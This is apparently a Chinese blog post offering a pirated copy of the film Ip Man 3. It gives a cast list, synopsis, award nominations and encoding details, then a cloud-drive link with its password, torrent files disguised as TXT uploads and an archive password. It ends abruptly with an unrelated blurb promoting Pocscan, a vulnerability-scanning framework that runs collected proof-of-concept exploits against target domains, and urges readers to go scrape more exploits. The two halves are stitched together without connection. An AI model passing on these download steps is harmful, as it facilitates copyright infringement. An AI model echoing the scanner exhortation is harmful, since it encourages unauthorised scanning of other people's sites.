　　　　　　张晋 Jin Zhang
　　　　　　熊黛林 Lynn Hung
　　　　　　谭耀文 Patrick Tam
　　　　　　吴千语 Karena Ng
　　　　　　喻亢 Kang Yu
　　　　　　郑则仕 Kent Cheng
　　　　　　梁家仁 Ka-Yan Leung
　　　　　　张继聪 Louis Cheung
　　　　　　陈国坤 Kwok-Kwan Chan

◎简　　介

　　1959年，叶问（甄子丹 饰）与张永成（熊黛林 饰）将大儿子叶准送回广东，小儿子叶正继续在香港读书。在与马鲸笙（谭耀文 饰）与其老板（泰森 饰）所带领的帮派抗争的过程中，叶问带领着自己的弟子保卫了小学，并结识了依靠拉车和在地下赌场斗武为生的张天志（张晋 饰），二 人惺惺相惜。然而 此时，自称 “咏春正宗” 的张天志却向叶问公开宣战，要为自己新开的武馆争取名誉。可是张永成突然病危，让叶问不得不肩负起照顾妻儿的责任。面对家庭和武术，叶问究竟会作何选择？他是否会应战张天志，夺回属于他 “咏春正宗” 的头衔？

◎获奖情况

　　第35届香港电影金像奖  (2016)
　　最佳电影(提名)
　　最佳导演(提名) 叶伟信
　　最佳男配角(提名) 张晋
　　最佳摄影(提名)
　　最佳剪接(提名)
　　最佳动作设计(提名)
　　最佳音响效果(提名)
　　最佳视觉效果(提名)

Title........: Yip Man 3 (2015)
Release Group: BMDru
Ripper ......: chinyan
Release Date : 03/13/2016
HD Source....: Ip Man 3 2015 Blu-ray 1080p AVC DTSX 7.1-MTeam
Video Format : x264
Video Bitrate: 3181KBit/s
Aspect Ratio : 2.353:1
Resolution ..: 1280 x 544
Audio Format : AC3
Audio Bitrate: 640 kb/s
BD Length ...: 1:44:41 (h:m:s)
Frame Rate ..: 24 fps
Language.....: Mandarin / Cantonese
Subtitle(s) .: N / A
Film Genre...: Action, Biography, Drama
File Size ...: 3.25 GB
IMDB Rating..: 7.7/10 from 5,785 users
http://www.imdb.com/title/tt2888046/

Encoding settings : ref=16 / subme=11 / Bbframes=16 me=umh / me_range=48

x264 [info]: profile High, level 5.0
x264 [info]: frame I:2301  Avg QP:19.76  size: 73777
x264 [info]: frame P:69520 Avg QP:20.20  size: 28206
x264 [info]: frame B:78933 Avg QP:23.77  size:  4570
x264 [info]: consecutive B-frames: 20.4% 29.7% 13.2% 16.1% 16.3%  3.6%  0.2%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.3%
encoded 150754 frames, 3.44 fps, 3172.97 kb/s

链接：http://pan.baidu.com/s/1pKye4Uf 密码：mn45

叶问3种子文件1.4G：Ip.Man.3.2015.720p.BluRay.x264.AAC-Tvboxnow.torrent

叶问3种子文件2.5G： 叶问3Ip.Man.3.2015.720p.BluRay.x264-WiKi.torrent

由于是种子文件，不能直接上传，所以改为TXT上传。

将文件重命名为种子文件后缀名即可。视频解压密码：blog.xiaohack.org/yewen3

Pocscan是一款开源 Poc 调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC 按照官方规范编写的 Poc对目标域名进行漏洞扫描。
提供了chrome浏览器插件,自动抓取页面的dns发到扫描后端.



下载地址https://github.com/erevus-cn/pocscan/
骚年,现在你就只缺POC了...还不快去爬！！